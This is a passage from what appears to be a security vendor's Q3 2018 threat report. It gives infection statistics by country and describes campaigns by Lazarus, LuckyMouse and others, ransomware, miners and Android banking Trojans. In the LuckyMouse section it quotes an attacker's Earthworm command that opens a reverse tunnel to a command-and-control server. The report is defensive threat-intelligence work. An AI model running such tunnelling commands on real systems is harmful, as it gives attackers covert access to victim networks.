Another interesting case was the CVE-2018-8440 security breach. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level – System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn’t require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user.

Attacks via web resources

The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In the third quarter of 2018, Kaspersky Lab solutions blocked 947,027,517 attacks launched from web resources located in 203 countries around the world. 246,695,333 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q3 2018 (download)

In Q3, the USA (52.81%) was home to most sources of web attacks. Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malware-class malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* %**
1 Venezuela 35.88
2 Albania 32.48
3 Algeria 32.41
4 Belarus 31.08
5 Armenia 29.16
6 Ukraine 28.67
7 Moldova 28.64
8 Azerbaijan 26.67
9 Kyrgyzstan 25.80
10 Serbia 25.38
11 Mauritania 24.89
12 Indonesia 24.68
13 Romania 24.56
14 Qatar 23.99
15 Kazakhstan 23.93
16 Philippines 23.84
17 Lithuania 23.70
18 Djibouti 23.70
19 Latvia 23.09
20 Honduras 22.97

* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded.
** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 18.92% of internet users’ computers worldwide experienced at least one malware-class web attack.

Geography of malicious web attacks in Q3 2018 (download)

Local threats

Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers – flash drives, camera memory cards, phones and external hard drives.

In Q3 2018, Kaspersky Lab’s file antivirus detected 239,177,356 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

The rating includes only malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* %**
1 Uzbekistan 54.93
2 Afghanistan 54.15
3 Yemen 52.12
4 Turkmenistan 49.61
5 Tajikistan 49.05
6 Laos 47.93
7 Syria 47.45
8 Vietnam 46.07
9 Bangladesh 45.93
10 Sudan 45.30
11 Ethiopia 45.17
12 Myanmar 44.61
13 Mozambique 42.65
14 Kyrgyzstan 42.38
15 Iraq 42.25
16 Rwanda 42.06
17 Algeria 41.95
18 Cameroon 40.98
19 Malawi 40.70
20 Belarus 40.66

* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded.
** Unique users on whose computers malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

Geography of malicious web attacks in Q3 2018 (download)

On average, 22.53% of computers globally faced at least one malware-class local threat in Q3.

IT threat evolution Q3 2018

Targeted attacks and malware campaigns

Lazarus targets cryptocurrency exchange

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global cryptocurrency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized cryptocurrency trading application that had been recommended to the company over email.

An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again.

It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack.

The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It would seem that in the chase after advanced users, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms.

This campaign should be a lesson to all of us and a warning to businesses relying on third-party software. Do not automatically trust the code running on your systems. Neither a good-looking website, nor a solid company profile, nor digital certificates guarantee the absence of backdoors. Trust has to be earned and proven.

You can read our Operation AppleJeus report here.

LuckyMouse

Since March 2018, we have found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.

The campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. We believe that the Chinese-speaking threat actor LuckyMouse is responsible for this campaign. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (“-s rssocks -d 103.75.190[.]28 -e 443”) creates a tunnel to a previously known LuckyMouse command-and-control (C2) server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor.

The malware consists of three modules: a custom C++ installer, the NDISProxy network filtering driver and a C++ Trojan:

We have not seen any indications of spear phishing or watering hole activity. We think the attackers spread their infectors through networks that were already compromised.

The Trojan is a full-featured RAT capable of executing common tasks such as command execution, and downloading and uploading files. The attackers use it to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and is popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so that the C2 is able to send commands.

You can read our LuckyMouse report here.

Financial fraud on an industrial scale

Usually, attacks on industrial enterprises are associated with cyber-espionage or sabotage. However, we recently discovered a phishing campaign designed to steal money from such organizations – primarily manufacturing companies.

The attackers use standard phishing techniques to lure their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals use legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, then scan for information on current purchases, and financial and accounting software. The attackers then use different ploys to steal company money – for example, by replacing the banking details in transactions. At the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that even when threat actors use simple techniques and known malware they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions. Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of company employees and record audio and video using devices connected to infected machines. While the series of attacks targets primarily Russian organizations, the same tactics and tools could be successfully used in attacks against industrial companies anywhere.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Malware stories

Exploiting the digital gold rush

For some time now, we’ve been tracking a dramatic decline in ransomware and a massive growth in cryptocurrency mining. The number of people who encountered miners grew from 1,899,236 in 2016-17 to 2,735,611 in 2017-18. This is clearly because it’s a lucrative activity for cybercriminals – we estimate that mining botnets generated more than $7,000,000 in the second half of 2017. Not only are we seeing purpose-built cryptocurrency miners, we’re also seeing existing malware adding this functionality to their arsenal.

The ransomware Trojan Rakhni is a case in point. The malware loader chooses which component to install depending on the device. The malware, which we have seen in Russia, Kazakhstan, Ukraine, Germany and India, is distributed through spam mailings with malicious attachments. One of the samples we analysed masquerades as a financial document. When loaded, this appears to be a document viewer. The malware displays an error message explaining why nothing has opened. It then disables Windows Defender and installs forged digital certificates.


The malware checks to see if there are Bitcoin-related folders on the computer. If there are, it encrypts files and demands a ransom. If not, it installs a cryptocurrency miner. Finally, the malware tries to spread to other computers within the network. You can read our analysis of Rakhni here.

Cybercriminals don’t just use malware to cash in on the growing interest in cryptocurrencies; they also use established social engineering techniques to trick people out of their digital money. This includes sending links to phishing scams that mimic the authorization pages of popular crypto exchanges, to trick their victims into giving the scammers access to their crypto exchange account – and their money. In the first half of 2018, we saw 100,000 of these attempts to redirect people to such fake pages.

The same approach is used to gain access to online wallets, where the ‘hook’ is a warning that the victim will lose money if they don’t go through a formal identification process – the attackers, of course, harvest the details entered by the victim. This method works just as well where the victim is using an offline wallet stored on their computer.

Scammers also try to use the speculation around cryptocurrencies to trick people who don’t have a wallet: they lure them to fake crypto wallet sites, promising registration bonuses, including cryptocurrency. In some cases, they harvest personal data and redirect the victim to a legitimate site. In others, they open a real wallet for the victim, which is compromised from the outset. Online wallets and exchanges aren’t the only focus of the scammers; we have also seen spoof versions of services designed to facilitate transactions with digital coins stored on the victim’s computer.

Earlier this year, we provided some advice on choosing a crypto wallet.

We recently discovered a cryptocurrency miner, named PowerGhost, focused mainly on workstations and servers inside corporate networks – thereby hoping to commandeer the power of multiple processors in one fell swoop. It’s not uncommon to see cybercriminals infect clean software with a malicious miner to promote the spread of their malware. However, the creators of PowerGhost went further, using fileless methods to establish it in a compromised network. PowerGhost tries to log in to network user accounts using WMI (Windows Management Instrumentation), obtaining logins and passwords using the Mimikatz data extraction tool. The malware can also be distributed using the EternalBlue exploit (used last year in the WannaCry and ExPetr outbreaks). Once a device has been infected, PowerGhost tries to enhance its privileges using operating system vulnerabilities. Most of the attacks we’ve seen so far have been in India, Turkey, Brazil and Colombia.

KeyPass ransomware

The number of ransomware attacks has been declining in the last year or so. Nevertheless, this type of malware remains a problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the ‘KeyPass‘ Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East.

We believe that the criminals behind KeyPass use fake installers that download the malware.

KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’, and ransom notes called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’ are saved in each directory containing encrypted files.

The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file.

Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the JSON format. If the C2 is unavailable – for example, the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, decryption of the victim’s files will be trivial.

Probably the most interesting feature of the KeyPass Trojan is its ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

Sextortion with a twist

Scams come in many forms, but the people behind them are always on the lookout for ways to lend credibility to the scam and maximise their opportunity to make money. One recent ‘sextortion’ scam uses stolen passwords for this purpose. The victim receives an email message claiming that their computer has been compromised and that the attacker has recorded a video of them watching pornographic material. The attackers threaten to send a copy of the video to the victim’s contacts unless they pay a ransom within 24 hours. The ransom demand is $1,400, payable in bitcoins.

The scammer includes a legitimate password in the message, in a bid to convince the victim that they have indeed been compromised. It seems that the passwords used are real, although in some cases at least they are very old. The passwords were probably obtained in an underground market and came from an earlier data breach.

The hunt for corporate passwords

It’s not just individuals who are targeted by phishing attacks – starting from early July, we saw malicious spam activity targeting corporate mailboxes. The messages contained an attachment with an .ISO extension that we detect as Loki Bot. The objective of the malware is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets, and then to forward the data to the criminals behind the attacks.

The messages are diverse in nature. They include fake notifications from well-known companies:

Or fake orders or offers:

The scammers pass off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually consisting of no more than a few lines and the subject mentioning the fake attachment.

Each year we see an increase in spam attacks on the corporate sector aimed at obtaining confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why it’s essential for corporate security strategy to include both technical protection and staff education – to stop them becoming the entry-point for a cyberattack.

Botnets: the big picture

Spam mailshots with links to malware, and bots downloading other malware, are just two botnet deployment scenarios. The choice of payload is limited only by the imagination of the botnet operator or their customers. It might be ransomware, a banker, a miner, a backdoor, etc. Every day we intercept numerous file download commands sent to bots of various types and families. We recently presented the results of our analysis of botnet activity for H2 2017 and H1 2018.

Here are the main trends that we identified by analyzing the files downloaded by bots:

  • The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for cryptocurrency mining.
  • The number of downloaded droppers is also on the rise, reflecting the fact that attacks are multi-stage and growing in complexity.
  • The share of banking Trojans among bot-downloaded files in 2018 decreased, but it’s too soon to speak of an overall reduction in number, since they are often delivered by droppers.
  • Increasingly, botnets are leased according to the needs of the customer, so in many cases it is difficult to pinpoint the ‘specialization’ of the botnet.

Using USB devices to spread malware

USB devices, which have been around for almost 20 years, offer an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors – most notably in the case of the state-sponsored threat Stuxnet, which used USB devices to inject malware into the network of an Iranian nuclear facility.

These days the use of USB devices as a business tool is declining, and there is greater awareness of the security risks associated with them. Nevertheless, millions of USB devices are still produced for use at home, in businesses and in marketing promotion campaigns such as trade show giveaways. So they remain a target for attackers.

Kaspersky Lab data for 2017 showed that one in four people worldwide were affected by a local cyber-incident, i.e. one not related to the internet. These attacks are detected directly on a victim’s computer and include infections caused by removable media such as USB devices.

We recently published a review of the current cyberthreat landscape for removable media, particularly USBs, and offered advice and recommendations for protecting these little devices and the data they carry.

Here is a summary of our findings.

  • USB devices and other removable media have been used to spread cryptocurrency mining software since at least 2015. Some victims were found to have been carrying the infection for years.
  • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
  • Every tenth person infected via removable media in 2018 was targeted with this cryptocurrency miner: around 9.22% – up from 6.7% in 2017 and 4.2% in 2016.
  • Other malware spread through removable media includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
  • The Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
  • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
  • Dark Tequila, a complex banking malware reported in August 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning.

Malware for smart devices is increasing not only in quantity but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine cryptocurrency.

You can read our report on IoT threats here, including tips on how to reduce the risk of smart devices being infected.

A look at the Asacub mobile banking Trojan

The first version of Asacub, which we saw in June 2015, was a basic phishing app: it was able to send a list of the victim’s apps, browser history and contact list to a remote C2 server, send SMS messages to a specific phone number and turn off the screen on demand. This mobile Trojan has evolved since then, off the back of a large-scale distribution campaign by its creators in spring and summer 2017), helping it to claim top spot in last year’s ranking of mobile banking Trojans – out-performing other families such as Svpeng and Faketoken. The Trojan has claimed victims in a number of countries, but the latest version steals money from owners of Android devices connected to the mobile banking service of one of Russia’s largest banks.

The malware is spread via an SMS messages containing a link and an offer to view a photo or MMS message. The link directs the victim to a web page containing a similar sentence and a button for downloading the Trojan APK file to the device.

Asacub masquerades as an MMS app or a client of a popular free ads service.

Once installed, the Trojan starts to communicate with the C2 server. Data is transferred in JSON format and includes information about the victim’s device – smartphone model, operating system, mobile operator and Trojan version.

Asacub is able to withdraw funds from a bank card linked to the phone by sending an SMS for the transfer of funds to another account using the number of the card or mobile phone. Moreover, the Trojan intercepts SMS messages from the bank that contain one-time passwords and information about the balance of the linked bank card. Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS messages and send them to the required number. What’s more, the victim can’t subsequently check the balance via mobile banking or change any settings, because after receiving a command with the code 40, the Trojan prevents the banking app from running on the phone.

You can read more here.

BusyGasper – the unfriendly spy

Early in 2018, our mobile intruder detection technology was triggered by a suspicious Android sample that turned out to belong to a new spyware family that we named BusyGasper. The malware isn’t sophisticated, but it does demonstrate some unusual features for this type of threat. BusyGasper is a unique spy implant with stand-out features such as device sensor listeners, including motion detectors that have been implemented with a degree of originality. It has an incredibly wide-ranging protocol – about 100 commands – and an ability to bypass the Doze battery saver. Like other modern Android spyware, it is capable of exfiltrating data from messaging applications – WhatsApp, Viber and Facebook. It also includes some keylogging tools – the malware processes every user tap, gathering its co-ordinates and calculating characters by matching given values with hardcoded ones.

The malware has a multi-component structure and can download a payload or updates from its C2 server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz. It is noteworthy that BusyGasper supports the IRC protocol, which is rarely seen among Android malware. In addition, it can log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.

There is a hidden menu for controlling the different implants that seems to have been created for manual operator control. To activate the menu, the operator needs to call the hardcoded number 9909 from an infected device.

The operator can use this interface to type any command. It also shows a current malware log.

This particular operation has been active since May. We have found no evidence of spear phishing or other common infection method. Some clues, such as the existence of a hidden menu mentioned above, suggest a manual installation method – the attackers gaining physical access to a victim’s device in order to install the malware. This would explain the number of victims – less than 10 in total, all located in the Russia. There are no similarities to commercial spyware products or to other known spyware variants, which suggests that BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low OPSEC level could indicate that less skilled attackers are behind the malware.

Thinking outside the [sand]box

One of the security principles built into the Android operating system is that all apps must be isolated from one another. Each app, along with its private files, operate in ‘sandbox’ that can’t be accessed by other apps. The point is to ensure that, even if a malicious app infiltrates your device, it’s unable to access data held by legitimate apps – for example, the username and password for your online banking app, or your message history. Unsurprisingly, hackers try to find ways to circumvent this protection mechanism.

In August, at DEF CON 26, Checkpoint researcher, Slava Makkaveev, discussed a new way of escaping the Android sandbox, dubbed a ‘Man-in-the-Disk’ attack.

Android also has a shared external storage, named External Storage. Apps must ask the device owner for permission to access this storage area – the privileges required are not normally considered dangerous, and nearly every app asks for them, so there is nothing suspicious about the request per se. External storage is used for lots of useful things, such as to exchange files or transfer files between a smartphone and a computer. However, external storage is also often used for temporarily storing data downloaded from the internet. The data is first written to the shared part of the disk, and then transferred to an isolated area that only that particular app can access. For example, an app may temporarily use the area to store supplementary modules that it installs to expand its functionality, additional content such as dictionaries, or updates.

The problem is that any app with read/write access to the external storage can gain access to the files and modify them, adding something malicious. In a real-life scenario, you may install a seemingly harmless app, such as a game, that may nevertheless infect your smartphone with malware. Slava Makkaveev gave several examples in his DEF CON presentation.

Google researchers discovered that the same method of attack could be applied to the Android version of the popular game, Fortnite. To download the game, players need to install a helper app first, and it is supposed to download the game files. However, using the Man-in-the-Disk attack, someone can trick the helper into installing a malicious app. Fortnite developers – Epic Games – have already issued a new version of the installer. So, if you’re a Fortnite player, use version 2.1.0 or later to be sure that you’re safe. If you have Fortnite already installed, uninstall it and then reinstall it from scratch using the new version.

How safe are car sharing apps?

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using these services?

The obvious reason why cybercriminals might be interested in car sharing is because they want to ride in someone’s car at someone else’s expense. But this could be the least likely scenario – it’s a crime that requires a physical point of presence and there are ways to cross check if the person who makes the booking is the one who gets the ride. The selling of hijacked accounts might be a more viable reason – driven by demand from those who don’t have a driving license or who have been refused registration by the car sharing service’s security team. Offers of this nature already exist on the market. In addition, if someone manages to hijack someone else’s car sharing account, they can track all their trips and steal things that are left behind in the car. Finally, a car that is fraudulently rented in somebody else’s name can always be driven to some remote place and cannibalized for spare parts, or used for criminal activity.

We tested 13 apps to see if their developers have considered security.

First, we checked to see if the apps could be launched on an Android device with root privileges and to see how well the code is obfuscated. This is important because most Android apps can be decompiled, their code modified (for example, so that user credentials are sent to a C2 server), then re-assembled, signed with a new certificate and uploaded again to an app store. An attacker on a rooted device can infiltrate the app’s process and gain access to authentication data.

Second, we checked to see if it was possible to create a username and password when using a service. Many services use a person’s phone number as their username. This is quite easy for cybercriminals to obtain as people often forget to hide it on social media, while car sharing customers can be identified on social media by their hashtags and photos.

Third, we looked at how the apps work with certificates and if cybercriminals have any chance of launching successful Man-in-the-Middle attacks. We also checked how easy it is to overlay an app’s interface with a fake authorization window.

The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analysed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not only very similar to each other but are actually based on the same code.

You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.